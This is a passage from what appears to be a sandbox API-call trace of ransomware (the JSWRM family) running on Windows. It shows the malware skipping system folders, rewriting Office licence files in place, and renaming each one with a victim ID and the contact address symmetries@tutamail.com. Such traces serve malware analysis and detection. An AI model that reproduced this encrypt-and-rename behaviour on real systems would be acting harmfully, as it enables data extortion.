lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3decec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3decec0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3ed1ce3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d65, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", cAlternateFileName="HO1457~1.XRM")) returned 1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.239] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0103.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0103.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0103.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0103.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0103.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.240] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11621) returned 1 [0103.240] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.240] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.242] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.243] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.243] CloseHandle (hObject=0x45c) returned 1 [0103.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0103.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0103.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0103.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0103.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0103.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0103.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.243] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0103.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0103.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0103.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.244] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3da0a82, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3da0a82, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3e5f5e0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dfe, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", cAlternateFileName="HOD2EE~1.XRM")) returned 1 [0103.244] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2=".") returned 1 [0103.244] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="..") returned 1 [0103.244] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="...") returned 1 [0103.245] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="windows") returned -1 [0103.245] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0103.245] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0103.245] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0103.245] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.245] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0103.245] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0103.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0103.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0103.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0103.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0103.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0103.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0103.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0103.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.246] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19966) returned 1 [0103.246] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0103.246] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0103.248] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.248] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0103.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.249] CloseHandle (hObject=0x45c) returned 1 [0103.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0103.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0103.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0103.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0103.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0103.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0103.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.249] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp3-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp3-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0103.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0103.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0103.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.250] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3da0a82, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3da0a82, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe40756e2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29ab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_OEM_Perp4-pl.xrm-ms", cAlternateFileName="HO8B40~1.XRM")) returned 1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2=".") returned 1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="..") returned 1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="...") returned 1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="windows") returned -1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="recovery") returned -1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.250] lstrcmpiW (lpString1="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpString2="msocache") returned -1 [0103.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0103.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0103.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_OEM_Perp4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_OEM_Perp4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0103.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0103.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0103.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0103.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_OEM_Perp4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_oem_perp4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.251] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10667) returned 1 [0103.251] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0103.251] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0103.353] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.353] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0103.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.353] CloseHandle (hObject=0x45c) returned 1 [0103.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0103.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0103.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0103.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 